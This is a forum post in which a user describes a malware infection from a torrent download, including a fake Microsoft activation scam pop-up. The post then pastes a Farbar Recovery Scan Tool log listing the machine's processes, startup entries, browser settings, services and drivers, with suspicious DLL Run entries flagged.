Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Trojan.SathurBot and Trojan.Fileless.MTGen


  • This topic is locked This topic is locked
20 replies to this topic

#1 captivekangaroo

captivekangaroo

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:35 AM

Posted 09 March 2017 - 09:46 PM

Yesterday I made the mistake of downloading a movie torrent from a site I never heard of but figured since it was in the top 5 of a Google search, I assumed it was a healthy download. When I tried to play the movie torrent, it would not open and after several moments a window appeared informing me that the torrent was incomplete or corrupt. When going back to search again, the chrome browser started acting strange and I had immediate advertising video pop-ups appear. Fearing a malware infection I ran a Malwarebytes scan. (I did this scan and one more scan today BEFORE coming to this forum for help so if need be I can post the two malwarebytes scan results also) After malwarebytes scan yesterday, it asked me to restart computer to finish the cleaning process. But when it restarted, a gray warning box came on the screen and informed me that my windows activation key had been compromised or corrupted and to please call the 888 number on the screen which was a Microsoft number, or so they said. (Riiiiiggght). It kinda looked legitimate except for the terrible grammar and misspelled words. Not to mention wanting me to "re-enter my microsoft user i.d. and password."  (Riiiight) So I ran another malwarebytes scan and it came up with the infections again. I knew by this time I was outta my league and Shazaam! Here I am. Here is the requested FRST.txt file:

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-03-2017

Ran by User (administrator) on CINDI-HP (09-03-2017 13:07:28)
Running from C:\Users\User\Downloads
Loaded Profiles: User &  (Available Profiles: User)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Plays.tv, LLC) C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
() C:\Windows\SQ931STI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
() C:\Program Files\devnullnull2017\SWU\swu.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
() C:\ProgramData\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.214.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [Corel Update Helper] => c:\Program Files\Corel\Corel PaintShop Pro X7 (64-bit)\pua.exe [2004312 2015-05-19] (Corel Corporation)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-22] (Microsoft Corporation)
HKLM\...\Run: [SQ931STI] => C:\WINDOWS\SQ931STI.EXE [151552 2007-01-24] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc.)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2776528 2016-12-14] (Malwarebytes)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-09-08] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-08-23] (Raptr, Inc)
HKLM-x32\...\Run: [kbdsprt] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [localSPM] => C:\WINDOWS\runkey.exe [424592 2016-08-05] ()
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-28] (Skype Technologies S.A.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [BingSvc] => C:\Users\User\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [26424960 2016-06-28] (Skype Technologies S.A.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [BingSvc] => C:\Users\User\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [YclnPack] => regsvr32.exe C:\Users\User\AppData\Local\YclnPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\...\Run: [Ondbics] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\User\AppData\Local\YgfPack\gdiMouseG32.dll <===== ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Bubbles.scr [806400 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2017-01-19]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe (Andy OS, inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\start_swu.lnk [2017-01-29]
ShortcutTarget: start_swu.lnk -> C:\Program Files\devnullnull2017\SWU\start.vbs ()
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2016-12-29]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\User\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\..\Interfaces\{149da2ce-6597-4fb4-ac77-0d6dba63dccb}: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{14f793bc-c866-4117-b385-51a5e00f8f35}: [DhcpNameServer] 209.18.47.61 209.18.47.62
ManualProxies: 
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-149886074-3337202059-3120734808-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> DefaultScope {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {04CC75DD-B8ED-4295-B77E-12F631AF6B8F} URL = hxxp://www.youtube.com/results?search_query={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {0CEB57FE-B8A8-44C8-994A-1C14E13C6D18} URL = hxxp://rover.ebay.com/rover/1/711-43047-14818-1/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003 -> {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> DefaultScope {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {04CC75DD-B8ED-4295-B77E-12F631AF6B8F} URL = hxxp://www.youtube.com/results?search_query={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {0CEB57FE-B8A8-44C8-994A-1C14E13C6D18} URL = hxxp://rover.ebay.com/rover/1/711-43047-14818-1/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004 -> {5E483FC9-3768-44D5-94AA-A588126E037D} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-01-29] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-01-29] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-01-21] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-01-21] (Oracle Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-01-29] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: m59rkng9.default
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default [2017-03-09]
FF Homepage: Mozilla\Firefox\Profiles\m59rkng9.default -> hxxps://www.google.com
FF NetworkProxy: Mozilla\Firefox\Profiles\m59rkng9.default -> type", 4
FF Extension: (Dark YouTube Theme) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\jid1-hDf2iQXGiUjzGQ@jetpack.xpi [2016-09-25]
FF Extension: (leethax.net extension) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\leethax@leethax.net.xpi [2017-03-05]
FF Extension: (Save Search Command) - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\m59rkng9.default\Extensions\{6523E848-E572-DC38-99AA-65F1138AB5BD} [2017-03-08] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [2017-02-14] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [2017-02-14] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-01-21] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-01-21] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-01-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=en-us
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://tv.twcc.com/listings","hxxp://www.palikan.com/?f=7&a=plk_coinisrs_15_44&cd=2XzuyEtN2Y1L1Qzu0Czzzy0C0D0C0F0F0C0DyCtB0C0CtAyEtN0D0Tzu0StCtAzyyDtN1L2XzutAtFtCtBtFyDtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StAyBzz0FyBtDyEtDtGyEtC0CyCtGyEyD0CyDtGtC0FtA0EtGtDtB0CtBtA0F0ByCyDyB0C0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0CtAtAzyyCtD0DzztG0DtCtAtDtGyEyDtBtBtG0AyBzztBtG0Ezz0D0F0EtB0ByDzztD0ByB2QtN0A0LzutB&cr=1549778723&ir=&uref=chmm","hxxp://search.conduit.com/?ctid=CT3321972&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SP831C4BFD-A01C-4C62-BAB0-4D12B1D8DA90&SSPV="
CHR DefaultSearchKeyword: Default -> https://www.google.com/_
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default [2017-03-09]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-26]
CHR Extension: (Free Proxy to Unblock any sites 
 Touch VPN) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2017-03-08]
CHR Extension: (Block Sender) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bklnjbfcmglhiaoppcckdodanccbelcg [2017-01-31]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-26]
CHR Extension: (Google Cast) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2016-11-23]
CHR Extension: (Facebook) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2016-05-26]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-26]
CHR Extension: (Pandora) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl [2016-05-26]
CHR Extension: (Google Docs Offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-20]
CHR Extension: (Crackle) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibfamoapbmmmlknoopmmfofgladlinic [2016-05-26]
CHR Extension: (Grammarly for Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-03-03]
CHR Extension: (Google Maps) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2016-05-26]
CHR Extension: (Facebook Email Signature - By WiseStamp) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mddbjkchhjpknjmkmkifidnpdnecmbjn [2016-05-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-26]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-03]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Guest Profile [2017-03-09]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile [2017-03-09]
CHR HKU\S-1-5-21-149886074-3337202059-3120734808-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-149886074-3337202059-3120734808-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-03092017120716004\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-08-21] (Advanced Micro Devices, Inc.) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\56.0.2924.51\remoting_host.exe [72024 2017-01-03] (Google Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4317648 2016-12-14] (Malwarebytes)
R2 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-09-08] (Plays.tv, LLC)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe [437392 2016-10-10] (Wondershare)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 APXACC; C:\WINDOWS\system32\DRIVERS\appexDrv.sys [229056 2015-04-03] (AppEx Networks Corporation)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 ghsdiagMDM; C:\WINDOWS\system32\DRIVERS\ghsdiagMDM.sys [122496 2011-11-28] (HS Incorporated)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [250816 2017-03-08] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
S3 netr28ux; C:\WINDOWS\System32\drivers\netr28ux.sys [2224128 2016-07-16] (MediaTek Inc.)
R3 netr28x; C:\WINDOWS\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
S3 SQ931; C:\WINDOWS\System32\Drivers\Capt931a.sys [593984 2007-06-05] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
U5 usbfilter; C:\Windows\System32\Drivers\usbfilter.sys [47232 2011-08-03] (Advanced Micro Devices)
R1 vmkbd3; C:\WINDOWS\system32\DRIVERS\vmkbd.sys [52288 2016-11-11] (VMware, Inc.)
R0 vsock; C:\WINDOWS\system32\DRIVERS\vsock.sys [91712 2016-09-30] (VMware, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S0 is3srv; SySWOW64\drivers\is3srv64.sys [X]
S0 szkg5; SySWOW64\drivers\szkg64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-03-09 13:07 - 2017-03-09 13:09 - 00024097 _____ C:\Users\User\Downloads\FRST.txt
2017-03-09 12:52 - 2017-03-09 12:52 - 02423808 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2017-03-09 12:41 - 2017-03-09 12:41 - 00000000 _____ C:\Users\User\Desktop\New Bitmap Image.bmp
2017-03-09 05:56 - 2017-03-09 05:56 - 00006000 _____ C:\Users\User\Documents\cc_20170309_055621.reg
2017-03-09 01:16 - 2017-03-09 01:16 - 00000000 ____D C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Kodi
2017-03-09 01:13 - 2017-03-09 01:32 - 00000000 ____D C:\Users\User\AppData\Roaming\Kodi
2017-03-09 01:08 - 2017-03-09 01:16 - 00000000 ____D C:\Program Files (x86)\Kodi
2017-03-08 17:03 - 2017-03-08 17:03 - 00000000 ____D C:\Users\User\AppData\Local\e97791
2017-03-08 15:18 - 2017-03-08 15:18 - 00000000 ____D C:\Users\User\AppData\Local\YclnPack
